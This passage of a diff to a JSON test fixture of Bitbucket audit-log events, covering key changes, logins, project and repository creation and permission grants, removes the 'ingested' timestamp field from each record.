https://futureboy.us/pgp.html\\r\\n\\r\\nmQINBFPOzTUBEADT1kIEMY1Ix+9DyNfGHE9HPjLSI/Ybnsn/bbx8cWmeAktoYjBS\\r\\nq29mJ0tchjyG8KP38vlkvfNYKn80985a/p7ZKupxOm1dDyAn5TZguDG2fEgCYxcB...\"},{\"name\":\"Email\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.email\",\"value\":\"eliasen@mindspring.com\"},{\"name\":\"Fingerprint\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.fingerprint\",\"value\":\"ec2392f2ede74488680da3cf5f2b4756ed873d23\"},{\"name\":\"ID\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.id\",\"value\":\"5f2b4756ed873d23\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"5f2b4756ed873d23\\\",\\\"fingerprint\\\":\\\"ec2392f2ede74488680da3cf5f2b4756ed873d23\\\",\\\"key-text\\\":\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\\\\r\\\\nVersion: GnuPG v1\\\\r\\\\nComment: See Alan's GPG guide at https://futureboy.us/pgp.html\\\\r\\\\n\\\\r\\\\nmQINBFPOzTUBEADT1kIEMY1Ix+9DyNfGHE9HPjLSI/Ybnsn/bbx8cWmeAktoYjBS\\\\r\\\\nq29mJ0tchjyG8KP38vlkvfNYKn80985a/p7ZKupxOm1dDyAn5TZguDG2fEgCYxcB...\\\",\\\"sub-keys\\\":[{\\\"id\\\":\\\"11c2e18c5314e70b\\\",\\\"fingerprint\\\":\\\"dbcf265ce5178b92adeaaa7111c2e18c5314e70b\\\"}],\\\"user\\\":{\\\"id\\\":2,\\\"name\\\":\\\"admin\\\",\\\"slug\\\":\\\"admin\\\"}}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035955,\"nano\":721000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3657,7 +3610,6 @@ }, "event": { "action": "bitbucket.ssh.audit.action.sshkeydeleted", - "ingested": "2021-12-24T00:37:41.020806122Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User deleted SSH access key from profile\",\"actionI18nKey\":\"bitbucket.ssh.audit.action.sshkeydeleted\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Key ID\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.id\",\"value\":\"1\"},{\"name\":\"Label\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.label\",\"value\":\"schacon@mylaptop.local\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":1,\\\"public-key\\\":\\\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\\\r\\\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\\\r\\\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\\\r\\\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\\\r\\\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\\\r\\\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\\\",\\\"label\\\":\\\"schacon@mylaptop.local\\\",\\\"user\\\":{\\\"id\\\":2,\\\"name\\\":\\\"admin\\\",\\\"slug\\\":\\\"admin\\\"}}\"},{\"name\":\"Public key\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.publickey\",\"value\":\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\r\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\r\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\r\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\r\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\r\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035959,\"nano\":377000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3730,7 +3682,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020806898Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User login failed\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationfailure\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"ADVANCED\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Error\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authenticationfailure.error\",\"value\":\"Invalid username or password.\"},{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035966,\"nano\":116000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationfailure", @@ -3799,7 +3750,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020807698Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035970,\"nano\":135000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", @@ -3878,7 +3828,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020808562Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"199\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:59:30.135Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 199\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035970,\"nano\":204000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3929,7 +3878,6 @@ }, "event": { "action": "bitbucket.scm.git.lfs.audit.action.gitlfsfeatureenabled", - "ingested": "2021-12-24T00:37:41.020809311Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"LFS feature enabled\",\"actionI18nKey\":\"bitbucket.scm.git.lfs.audit.action.gitlfsfeatureenabled\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Global administration\",\"categoryI18nKey\":\"bitbucket.service.audit.category.globaladministration\",\"level\":\"ADVANCED\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036037,\"nano\":416000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3994,7 +3942,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectcreationrequested", - "ingested": "2021-12-24T00:37:41.020810039Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"TEST\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project creation requested\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectcreationrequested\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036077,\"nano\":660000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4074,7 +4021,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.projectpermissiongranted", - "ingested": "2021-12-24T00:37:41.020810765Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Project permission granted\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.projectpermissiongranted\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"PROJECT_ADMIN\\\",\\\"user\\\":\\\"admin\\\"}\"},{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"PROJECT_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036077,\"nano\":828000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4146,7 +4092,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectcreated", - "ingested": "2021-12-24T00:37:41.020811563Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project created\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectcreated\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036077,\"nano\":832000000},\"version\":\"1.0\"}", "type": [ "creation" @@ -4241,7 +4186,6 @@ }, "event": { "action": "bitbucket.branch.audit.action.projectbranchmodelconfigurationcreated", - "ingested": "2021-12-24T00:37:41.020812295Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project branch model created\",\"actionI18nKey\":\"bitbucket.branch.audit.action.projectbranchmodelconfigurationcreated\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Feature prefix\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.featureprefix\",\"value\":\"feature/\"},{\"name\":\"Development branch\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.developmentbranch\",\"value\":\"(default branch)\"},{\"name\":\"Hotfix prefix\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.hotfixprefix\",\"value\":\"hotfix/\"},{\"name\":\"Bugfix prefix\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.bugfixprefix\",\"value\":\"bugfix/\"},{\"name\":\"Production branch\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.productionbranch\",\"value\":\"(none)\"},{\"name\":\"Release prefix\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.releaseprefix\",\"value\":\"release/\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036078,\"nano\":549000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4311,7 +4255,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositorycreationrequested", - "ingested": "2021-12-24T00:37:41.020813045Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"0\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository creation requested\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositorycreationrequested\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036095,\"nano\":988000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4386,7 +4329,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositorycreated", - "ingested": "2021-12-24T00:37:41.020813838Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository created\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositorycreated\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"project\\\":\\\"TEST\\\",\\\"repository\\\":\\\"test2\\\"}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036101,\"nano\":63000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4456,7 +4398,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositoryaccessed", - "ingested": "2021-12-24T00:37:41.020814562Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository accessed by user\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositoryaccessed\",\"area\":\"END_USER_ACTIVITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036101,\"nano\":495000000},\"version\":\"1.0\"}", "type": [ "access" @@ -4531,7 +4472,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositoryaccessed", - "ingested": "2021-12-24T00:37:41.020815372Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository accessed by user\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositoryaccessed\",\"area\":\"END_USER_ACTIVITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036200,\"nano\":954000000},\"version\":\"1.0\"}", "type": [ "access" @@ -4606,7 +4546,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositoryaccessed", - "ingested": "2021-12-24T00:37:41.020816102Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository accessed by user\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositoryaccessed\",\"area\":\"END_USER_ACTIVITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036221,\"nano\":114000000},\"version\":\"1.0\"}", "type": [ "access" @@ -4686,7 +4625,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositorymodificationrequested", - "ingested": "2021-12-24T00:37:41.020816830Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository change requested\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositorymodificationrequested\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036221,\"nano\":684000000},\"version\":\"1.0\"}", "type": [ "change" @@ -4766,7 +4704,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositorymodified", - "ingested": "2021-12-24T00:37:41.020817643Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository settings changed\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositorymodified\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036221,\"nano\":710000000},\"version\":\"1.0\"}", "type": [ "change" @@ -4841,7 +4778,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositoryaccessed", - "ingested": "2021-12-24T00:37:41.020818373Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository accessed by user\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositoryaccessed\",\"area\":\"END_USER_ACTIVITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036222,\"nano\":444000000},\"version\":\"1.0\"}", "type": [ "access" @@ -4931,7 +4867,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.repositorypermissiongrantrequested", - "ingested": "2021-12-24T00:37:41.020819098Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"},{\"id\":\"4\",\"name\":\"09e096ea84245cc5\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Repository permission requested\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.repositorypermissiongrantrequested\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"REPO_WRITE\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"REPO_WRITE\\\",\\\"user\\\":\\\"09e096ea84245cc5\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036247,\"nano\":861000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5023,7 +4958,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.repositorypermissiongranted", - "ingested": "2021-12-24T00:37:41.020819939Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"},{\"id\":\"4\",\"name\":\"09e096ea84245cc5\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Repository permission granted\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.repositorypermissiongranted\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"REPO_WRITE\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"REPO_WRITE\\\",\\\"user\\\":\\\"09e096ea84245cc5\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036248,\"nano\":132000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5115,7 +5049,6 @@ }, "event": { "action": "bitbucket.ssh.audit.action.sshkeycreated", - "ingested": "2021-12-24T00:37:41.020820727Z", "original": "{\"affectedObjects\":[{\"id\":\"4\",\"name\":\"09e096ea84245cc5\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added SSH access key to profile\",\"actionI18nKey\":\"bitbucket.ssh.audit.action.sshkeycreated\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Label\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.label\",\"value\":\"schacon@mylaptop.local\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":2,\\\"public-key\\\":\\\"ssh-rsa 